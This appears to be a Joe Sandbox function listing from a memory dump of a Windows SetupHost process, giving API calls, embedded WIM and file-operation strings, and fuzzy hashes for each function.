                                                                                                                                                                                                                • Instruction ID: a7331b3733589d97a0942cdef5506ab5c63ea50320a0459ffdd76dd870225fb2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55de3472fe881ccf0fea5f2f83f93e3014de598ee4207b875cc9eb8e8fcf0f86
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F418571904356ABDB12DFE68888AAF7BBCFBC9B40B144529B505D7250DBB0CD81CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,?,00000000), ref: 009C05C4
                                                                                                                                                                                                                • GetLastError.KERNEL32(009C04E0,?,00000001), ref: 009C0636
                                                                                                                                                                                                                • memset.MSVCRT ref: 009C065D
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,009C04E0,?,00000001), ref: 009C0671
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 009C06E2
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,009C04E0,?,00000001), ref: 009C06F3
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009C06FA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009C0702
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009C0709
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009C0711
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009C0718
                                                                                                                                                                                                                  • Part of subcall function 009BEA79: SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,?,009BEA4C,?,00000000), ref: 009BEA91
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • DeletePathEngine: Hit %d failure%s during recursive deletion of [%s]; 1st error = 0x%x, cd = [%s], xrefs: 009C06BC
                                                                                                                                                                                                                • <unavailable>, xrefs: 009C0695
                                                                                                                                                                                                                • , xrefs: 009C059D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLast$FreeProcess$CurrentDirectorymemset
                                                                                                                                                                                                                • String ID: $<unavailable>$DeletePathEngine: Hit %d failure%s during recursive deletion of [%s]; 1st error = 0x%x, cd = [%s]
                                                                                                                                                                                                                • API String ID: 3688531368-375639435
                                                                                                                                                                                                                • Opcode ID: c330fad93c438b82d37560fa814cf3cee8054a163d43a4c66c6d7999fff3fd15
                                                                                                                                                                                                                • Instruction ID: 0fd247b19683d5dc0a1e46b4609a6adf16aff19ee228bea476d280f7c3614621
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c330fad93c438b82d37560fa814cf3cee8054a163d43a4c66c6d7999fff3fd15
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A41B231E01219EBCB20AFA0AD4DFEEB6B8ABD8350F1044EDF40992151DA704E818F51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00000000), ref: 009C09F9
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009C0A9A
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(user32.dll,00000000,00000000), ref: 009C0AB9
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SendMessageW), ref: 009C0ACB
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 009C0AF0
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009C0AFC
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009C0B03
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 009C0B0C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFreeHeapLastLibrary$AddressLoadObjectProcProcessSingleWait
                                                                                                                                                                                                                • String ID: CopyDirectoryFileCallback: The copy was canceled by the user.$CopyDirectoryFileCallback: Unable to %s file from [%s] to [%s]; GLE = 0x%x$SendMessageW$copy$move$user32.dll
                                                                                                                                                                                                                • API String ID: 1769290588-226468883
                                                                                                                                                                                                                • Opcode ID: aed7a114c2041e9e39109b26deca7b7f2e90f7ed85a87bf6ce3732dffd23e45c
                                                                                                                                                                                                                • Instruction ID: 71667d5f1359910f2c2b34507fc7d3eb184ab24f8695bb9bdecaccdef93be26c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aed7a114c2041e9e39109b26deca7b7f2e90f7ed85a87bf6ce3732dffd23e45c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5341CF70A00701EBDF209FA5CC49FAE7BB9FBC8711F108528F90692290DA70DD41CB11
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(?,?,00A124E8,00000088,009E3417,?,?,?,?,00000000,00000000,00000000), ref: 009EA6A5
                                                                                                                                                                                                                • CreateFileMappingW.KERNEL32 ref: 009EA6CA
                                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,00A124E8,00000088,009E3417,?,?,?,?,00000000,00000000,00000000), ref: 009EA6F8
                                                                                                                                                                                                                • __allrem.LIBCMT ref: 009EA709
                                                                                                                                                                                                                • MapViewOfFile.KERNEL32(?,00000004,?,009E3417,?,?,?,?,00000000,?,?,00A124E8,00000088,009E3417,?,?), ref: 009EA746
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00A124E8,00000088,009E3417,?,?,?,?,00000000,00000000,00000000), ref: 009EA773
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EA8D7
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009EA8EF
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000088,?,?,00A124E8,00000088,009E3417,?,?,?,?,00000000,00000000,00000000), ref: 009EA968
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00A124E8,00000088,009E3417,?,?,?,?,00000000,00000000,00000000), ref: 009EA97E
                                                                                                                                                                                                                  • Part of subcall function 009E930A: memset.MSVCRT ref: 009E9336
                                                                                                                                                                                                                  • Part of subcall function 009E930A: GetProcessHeap.KERNEL32(00000000,?,0000054C,80070216,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 009E9607
                                                                                                                                                                                                                  • Part of subcall function 009E930A: HeapFree.KERNEL32(00000000), ref: 009E960E
                                                                                                                                                                                                                  • Part of subcall function 009E930A: GetProcessHeap.KERNEL32(00000000,?,0000054C,80070216,-000000FF,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000), ref: 009E9745
                                                                                                                                                                                                                  • Part of subcall function 009E930A: HeapFree.KERNEL32(00000000), ref: 009E974C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00A124E8,00000088,009E3417,?,?,?,?,00000000,00000000,00000000), ref: 009EAA46
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00A124E8,00000088,009E3417,?,?,?,?,00000000,00000000,00000000), ref: 009EAA53
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Last$Heap$File$FreeProcessStatus$CreateInfoMappingSizeSystemView__allremmemset
                                                                                                                                                                                                                • String ID: ResNodesLoad
                                                                                                                                                                                                                • API String ID: 567943401-3039925408
                                                                                                                                                                                                                • Opcode ID: cce3d8300ef07b33abb8b41c468b77a6eabdaabf422a935dc485fb31736b02f0
                                                                                                                                                                                                                • Instruction ID: 368286c30f84de141eb2ed95e87f9c5b042a045abc3062a716e3cfdab121f5a8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cce3d8300ef07b33abb8b41c468b77a6eabdaabf422a935dc485fb31736b02f0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3D14075E002899FCB16CF9AD9806EDBBB5BF84310F24852DE415EB361D731AD42CB51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,?,009E34C3,00000000,?,?,00000000,00000000,?,00000000,009DDD88), ref: 009DF50C
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,009E34C3,00000000,?,?,00000000,00000000,?,00000000,009DDD88,?,00000000,00000000,00000000), ref: 009DF516
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,009E34C3,00000000,?,?,00000000,00000000,?,00000000,009DDD88,?,00000000,00000000,00000000), ref: 009DF52C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,009E34C3,00000000,?,?,00000000,00000000,?,00000000), ref: 009DF58E
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DF595
                                                                                                                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 009DF5F2
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009E34C3,00000000,?,?,00000000,00000000), ref: 009DF607
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,009E34C3,00000000,?,?,00000000,00000000), ref: 009DF61D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,009E34C3,00000000,?,?,00000000,00000000,?,00000000,009DDD88), ref: 009DF641
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DF648
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000,?,?,009E34C3,00000000,?,?,00000000,00000000,?,00000000,009DDD88,?), ref: 009DF660
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Heap$FileFreeProcess$SizeWrite
                                                                                                                                                                                                                • String ID: %I64u$WIM\TOTALBYTES
                                                                                                                                                                                                                • API String ID: 3232998631-3809107449
                                                                                                                                                                                                                • Opcode ID: d0177079676e2e084e2fdc530bbcae1ed09ba1ec0b60d031e52a4bb1047391c0
                                                                                                                                                                                                                • Instruction ID: fe3c4558c86d9bdec16e375a5c5227aa75563be2838c5b67f1c2413c8e0b0c45
                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0177079676e2e084e2fdc530bbcae1ed09ba1ec0b60d031e52a4bb1047391c0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E751D472D402299B8B20DFF59C56ABF76B8AF04750B55857AFC02E7350D734DD018BA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00A0E312
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00A0E357
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(api-ms-win-eventing-provider-l1-1-0.dll), ref: 00A0E370
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EventWrite), ref: 00A0E382
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EventRegister), ref: 00A0E397
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EventUnregister), ref: 00A0E3AC
                                                                                                                                                                                                                • EventRegister.ADVAPI32 ref: 00A0E409
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$HandleModule$EventRegisterVersion
                                                                                                                                                                                                                • String ID: EventRegister$EventUnregister$EventWrite$advapi32.dll$api-ms-win-eventing-provider-l1-1-0.dll
                                                                                                                                                                                                                • API String ID: 3544251202-1971782300
                                                                                                                                                                                                                • Opcode ID: 8c962d28263df8eb6d0da8fe7a4d7f00376051b2a7c5350571b9b06b06192c88
                                                                                                                                                                                                                • Instruction ID: 28dae79432934f7f2f796a434e6a53affbd5aa9082a907051d98e479ba68f584
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c962d28263df8eb6d0da8fe7a4d7f00376051b2a7c5350571b9b06b06192c88
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E41C275A0131D9BCB25CF64BC44ADEBBB4AB8D704F048499E80997290D7719E42DFA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 00A0E52C
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00A0E562
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(api-ms-win-eventing-provider-l1-1-0.dll), ref: 00A0E577
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EventWrite), ref: 00A0E589
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EventRegister), ref: 00A0E59E
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,EventUnregister), ref: 00A0E5B3
                                                                                                                                                                                                                • EventRegister.ADVAPI32 ref: 00A0E602
                                                                                                                                                                                                                • RegisterTraceGuidsW.ADVAPI32(Function_0008E160,00A13198,0099DD20,00000001,?,00000000,00000000,00A13198), ref: 00A0E63A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$HandleModuleRegister$EventGuidsTraceVersion
                                                                                                                                                                                                                • String ID: EventRegister$EventUnregister$EventWrite$advapi32.dll$api-ms-win-eventing-provider-l1-1-0.dll
                                                                                                                                                                                                                • API String ID: 3594828617-1971782300
                                                                                                                                                                                                                • Opcode ID: 6aa2a61c88a5b7a674a42de145d6a66891cc669bec3d81ac20a0671c79dc274d
                                                                                                                                                                                                                • Instruction ID: a3a918cb1b7c5f248f4073aa02bcb3ebcf71946b373df0ad7c58c5551d859216
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6aa2a61c88a5b7a674a42de145d6a66891cc669bec3d81ac20a0671c79dc274d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E312A72901319ABDF25DF64FC097DF7BB4AB48708F048958E805D31D1EBB09A42DB60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009EC785
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EC78C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009EC7A2
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009EC7A9
                                                                                                                                                                                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 009EC7CE
                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009EC7E4
                                                                                                                                                                                                                • SetFileTime.KERNEL32(?,00000000,00000000,?), ref: 009EC7F9
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 009EC806
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EC834
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EC866
                                                                                                                                                                                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 009EC888
                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009EC89A
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EC907
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 009EC93E
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009EC94B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Time$File$ErrorHeapLast$DateFreeLocalProcess$CloseCreateHandle
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 663749601-0
                                                                                                                                                                                                                • Opcode ID: 960b7e5bc3174e3749f44e7dccfe7c25403c31849cf05830dd51f76017d4ea41
                                                                                                                                                                                                                • Instruction ID: 5e4f5cf03e7d21470f8c36f213b6c254d8054be6c17133e74aee166b5dec4e9c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 960b7e5bc3174e3749f44e7dccfe7c25403c31849cf05830dd51f76017d4ea41
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C71B3B2900245ABDB22CFBACD48BAE7BB8FB44711F148615F891E7194D774DE02CB50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 009E6875
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 009E691F
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(000000FF,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009E6997
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,?,?,00000000,00000000,00000000), ref: 009E69A4
                                                                                                                                                                                                                • DuplicateHandle.KERNEL32 ref: 009E69AB
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 009E69D1
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E6A61
                                                                                                                                                                                                                • RtlNtStatusToDosError.NTDLL ref: 009E6A73
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 009E6ABB
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,00000000,00000000,00000000), ref: 009E6AD3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Error$Last$CurrentProcessStatus$DuplicateHandlememset
                                                                                                                                                                                                                • String ID: $ResAddFromFileAndHandle
                                                                                                                                                                                                                • API String ID: 3427536320-1571120640
                                                                                                                                                                                                                • Opcode ID: bd49fc64dae10c12c131ac52bc4c99d10ade55f3289cc7e907111fc3a1132fd5
                                                                                                                                                                                                                • Instruction ID: 1da217e82ca57c551cc96a4513a53a32d7b1ebabfbb138725093363053be86bf
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd49fc64dae10c12c131ac52bc4c99d10ade55f3289cc7e907111fc3a1132fd5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76814B71E003699FDF22DF66CC44BEE77B9AF58350F1081A9A909E7241EB709E848F51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057), ref: 009C02CA
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009C02F8
                                                                                                                                                                                                                • SetLastError.KERNEL32(000004C7), ref: 009C030B
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 009C04C2
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • DeletePathDirectoryCallback: Spoofing detected deleting [%s] -> [%s], xrefs: 009C043B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                                                                                • String ID: DeletePathDirectoryCallback: Spoofing detected deleting [%s] -> [%s]
                                                                                                                                                                                                                • API String ID: 1452528299-3938585608
                                                                                                                                                                                                                • Opcode ID: 05ea8fb2fef8b533cbf4b110553f9b2fb4021fe98155ee3c58660f13836a9108
                                                                                                                                                                                                                • Instruction ID: b7f7a1afde03277211ee10d41e11b5ab9015a3eca1a9dfcf27046b748eae8498
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05ea8fb2fef8b533cbf4b110553f9b2fb4021fe98155ee3c58660f13836a9108
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D615671A00605EFDB14DFA4C984FAFB7B9AB84350F20852CE959972A0E770EE41CB51
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?), ref: 009DECE9
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009DECF0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • WIM\IMAGE[*]\HARDLINKBYTES, xrefs: 009DEC1E
                                                                                                                                                                                                                • WIM\IMAGE[*]\DIRCOUNT, xrefs: 009DEBC4
                                                                                                                                                                                                                • WIM\IMAGE[*]\TOTALBYTES, xrefs: 009DEC00
                                                                                                                                                                                                                • WIM\IMAGE[*]\CREATIONTIME\HIGHPART, xrefs: 009DEC3C
                                                                                                                                                                                                                • WIM\IMAGE[*]\LASTMODIFICATIONTIME\HIGHPART, xrefs: 009DEC74
                                                                                                                                                                                                                • WIM\IMAGE[*]\WIMBOOTENTRIES, xrefs: 009DECCE
                                                                                                                                                                                                                • WIM\IMAGE[*]\WIMBOOT, xrefs: 009DECAE
                                                                                                                                                                                                                • WIM\IMAGE[*], xrefs: 009DEBA6
                                                                                                                                                                                                                • WIM\IMAGE[*]\CREATIONTIME\LOWPART, xrefs: 009DEC5A
                                                                                                                                                                                                                • WIM\IMAGE[*]\LASTMODIFICATIONTIME\LOWPART, xrefs: 009DEC8E
                                                                                                                                                                                                                • INDEX, xrefs: 009DEBA1
                                                                                                                                                                                                                • WIM\IMAGE[*]\FILECOUNT, xrefs: 009DEBE2
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess
